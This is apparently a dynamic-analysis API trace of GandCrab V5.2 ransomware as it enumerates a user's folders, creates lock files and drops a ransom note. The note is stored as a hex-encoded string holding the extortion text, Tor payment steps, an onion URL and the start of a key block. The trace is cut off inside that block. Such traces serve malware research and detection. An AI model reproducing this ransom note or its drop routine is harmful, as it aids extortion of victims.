param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned 120 [0079.150] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0079.152] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.152] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\") returned 96 [0079.152] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*" [0079.152] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503738 [0079.152] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.152] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.153] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.153] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.153] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.153] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0079.153] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0079.153] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033" [0079.153] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\" [0079.153] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.153] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.154] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.154] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.154] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.154] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.154] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.154] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\\\TITWMVJL-DECRYPT.txt") returned 122 [0079.154] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\1033\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0079.156] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x